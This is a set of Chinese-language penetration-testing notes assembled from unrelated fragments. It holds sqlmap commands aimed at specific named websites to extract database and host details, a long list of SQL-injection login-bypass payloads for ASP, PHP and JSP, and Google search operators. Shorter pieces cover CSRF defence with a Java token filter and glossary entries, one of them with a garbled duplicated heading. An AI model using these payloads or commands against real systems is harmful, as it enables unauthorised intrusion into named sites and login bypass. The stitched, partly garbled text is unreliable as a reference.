sqlmap.py -u "http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911" --threads 10 --level 3 -p myparams --dbms "MySQL" --current-db --current-user --hostname
sqlmap -u "http://www.1think.com.cn/Search.php?SearchKeyWords=HAHA" --threads 15 --level 3 --dbms "Microsoft SQL Server" --os "Windows" --current-db --current-user --hostname
BSoD,Blue Screen of Death,即蓝屏死机。
微软操作系统的经典死机提示屏幕。通常是由于工作在Ring0
级的内核程序出错导致的,比如内核程序访问了不可访问的内存会立即导致BSoD。
Proof of Conc Proof of Conceptept
简称PoC,
中文翻译为概念证明,是证实发布的漏洞真实性的测试代码,一般可以理解为和漏洞利用工具差不多的意思。
在 filter
中验证请求中的 token
HttpServletRequest req = (HttpServletRequest)request;
HttpSession s = req.getSession();
// 从 session 中得到 csrftoken 属性
String sToken = (String)s.getAttribute(“csrftoken”);
if(sToken == null){
// 产生新的 token 放入 session 中
sToken = generateToken();
s.setAttribute(“csrftoken”,sToken);
chain.doFilter(request, response);
} else{
// 从 HTTP 头中取得 csrftoken
String xhrToken = req.getHeader(“csrftoken”);
// 从请求参数中取得 csrftoken
String pToken = req.getParameter(“csrftoken”);
if(sToken != null && xhrToken != null && sToken.equals(xhrToken)){
chain.doFilter(request, response);
}else if(sToken != null && pToken != null && sToken.equals(pToken)){
chain.doFilter(request, response);
}else{
request.getRequestDispatcher(“error.jsp”).forward(request,response);
}
}
跨站请求伪造CSRF漏洞防御
CSRF
漏洞防御主要可以从三个层面进行,即服务端的防御、用户端的防御和安全设备的防御。
1、 服务端的防御
1.1 验证HTTP Referer
字段
1.2 在请求地址中添加token
并验证
1.3 在HTTP
头中自定义属性并验证
2、其他防御方法
CSRF
攻击是有条件的,当用户访问恶意链接时,认证的cookie
仍然有效,所以当用户关闭页面时要及时清除认证cookie
,对支持TAB
模式(新标签打开网页)的浏览器尤为重要。- 尽量少用或不要用
request()
类变量,获取参数指定request.form()
还是request. querystring ()
,这样有利于阻止CSRF
漏洞攻击,此方法只不能完全防御CSRF
攻击,只是一定程度上增加了攻击的难度。
asp aspx
万能密码
1: "or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6: "or 1=1--
7:'or'a'='a
8: "or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 新型万能登陆密码
用户名 `' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)`
密码 1
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
17.`admin' or 'a'='a` 密码随便
PHP万能密码
'or'='or'
'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ' OR '1'='1
jsp 万能密码
1' or '1'='1
admin' OR 1=1/*
用户名:admin 系统存在这个用户的时候 才用得上
密码:1' or '1'='1
搜索命令
- intitle: 限制搜索的词语是网页标题中包含的关键词
intitle:keyword
- inurl: 限制搜索的网页的地址
inurl:keyword
- filetype: 限制所搜索的文件一个特定的格式
filetype:extension
- site: 限制所进行的搜索在指定的域名或网站内
site:domain
- intext: 限制搜索的词语是网页内文包含的关键词
intext:keyword